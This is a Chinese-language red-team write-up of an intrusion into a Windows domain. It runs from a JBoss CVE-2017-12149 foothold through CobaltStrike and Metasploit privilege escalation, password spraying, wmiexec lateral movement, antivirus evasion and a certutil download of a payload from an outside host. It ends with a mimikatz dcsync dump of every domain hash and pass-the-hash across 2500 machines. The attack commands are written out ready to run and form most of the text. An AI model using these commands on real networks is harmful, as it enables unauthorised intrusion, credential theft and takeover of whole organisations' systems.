一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

共 1619字,需浏览 4分钟

 ·

2022-05-09 23:15

前言

首先是通过 CVE-2017-12149 拿到了一个口子:

d11bf7865e8e29b031bec37b7ab38c6a.webp

但其实 Jboss 的这个路径可以查看到日志 http://redteam.red:9090/status 发现有日志,已经被上传了 webshell:

a22c83175614283e38e99210a3360570.webp

后来通过 Bypass 后使用 powershell 上线到 CobaltStrike:

405080ebb7d02e7fbac986fafa97f0d5.webp

利用 Metasploit 特权提权拿到 SYSTEM SHELL

上线之后通过信息搜集发现有几百个补丁,通过已知漏洞提权无果:

904a0ea06652037ac7d656f2fdc155ba.webp

随后吧 CobaltStrike 的 Beacon 互传到了 Metasploit:

CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf

MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
62cfaf9e4d627baaa86086614e00ce0e.webp

f62b0d3a4013d32e5d9b2868d01c699d.webp

然后通过 Metasploit 的提权检测模块找到了几个提权 exp :

run post/multi/recon/local_exploit_suggester
0a591389da145833435afbf5d4576064.webp

然后利用提权 exp :

290b2b808773e93864012e3df19af898.webp

发现用户没变,但是当前特权变多了:

a2afb59199bb5f261c65c9ebff4b1ce7.webp

然后直接 getsystem 提权到 SYSTEM:

61e1ee9bbfc4b44efed80897cd2e9d4c.webp

最后利用 SYSYEM 身份的把 shell 传到 Cobaltstrike:

e6b0699153719dcf8995c6522a5e80e0.webp6721affbff2e7ccfd086fad08bae9512.webp

当前权限就可以抓到密码了:

bd362a1478e196b5e82c65e7de6ba78d.webp

a778fc0d9f2155e5b953eae8118967f5.webp

内网渗透

虽然已经拿到 SYSTEM 会话身份,但是发现没有域管的进程,结果只能另寻他路!然后用抓到到密码去喷射域内其他主机:

a778fc0d9f2155e5b953eae8118967f5.webp

然后横向 wmi 横向移动:

 proxychains python3 wmiexec.py -shell-type cmd administrator:passwd@xx.xx.0.108 -codec gbk

b51dc847421f631164dbcb618bf5dd0c.webp

之后发现 10.xx.0.156 有一个域管的进程:tsklist /v

并且发现当前机器还有微软自带杀毒:

b838e8db1d50cbba376c508ac73f06dc.webp

随后通过 Golang 做了一下免杀,然后让目标下载我们的 exe,通过 certutil 下载我们的 exe:

e49c293871ec6377401a9c1159a100cc.webp

然后运行发现有问题:

f8600910e8e2548452b2ceb22c4ca197.webp

然后我吧 exe 编码成 txt:

certutil -encode main.exe main.txt

然后目标下载 txt 然后解码再运行:

certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt

certutil -decode main.txt main.exe

直接上线到 CobaltStrike:

770a2e8fd3da92a350b677100453f278.webp

然后先 getsystem 提权到 SYSYEM:

176f2c6e97233a171dbaad55cf53e064.webp

然后窃取域管的进程:

77f567270211699cb2c81cd61f46b287.webpff1d7f4bf6ac38a56b90e771a5b275fe.webp

随后查询域控IP:

shell net group "Domain Controllers" /domain
shell ping Controllers Computer (ping 域控机器名即可得到IP)

直接拿到域控:

7f071f418a970edb8d8be7d2af7a2c47.webp

最后直接 dcsync dump 域内全部 hash:

mimikatz lsadump::dcsync /domain:redteam.red /all /csv > c:\hash.txt

ac90bf79f8685769a93e66d3e264207b.webp

这个时候域内数千多个域用户的 hash 都拿到了,可以进行 pth,此时利用 administrator 的 hash 来对域内机器进行批量执行命令:

proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H xxxxxxxxxxxxxxxxxxxxx -d psnet.com -x "net user"

5fbab97ebeee48f58b7186c6632e3c04.webp

最后使用 SharpHound.exe 查看下域内信息:

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

444d6d83e2d4c7d20d95face98757375.webp

b67700f8e34674ed9ad730cc01418dde.webp

看了看,内网 5000 多个用户,2500 多台机器都沦陷,没啥难度。

浏览 89
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报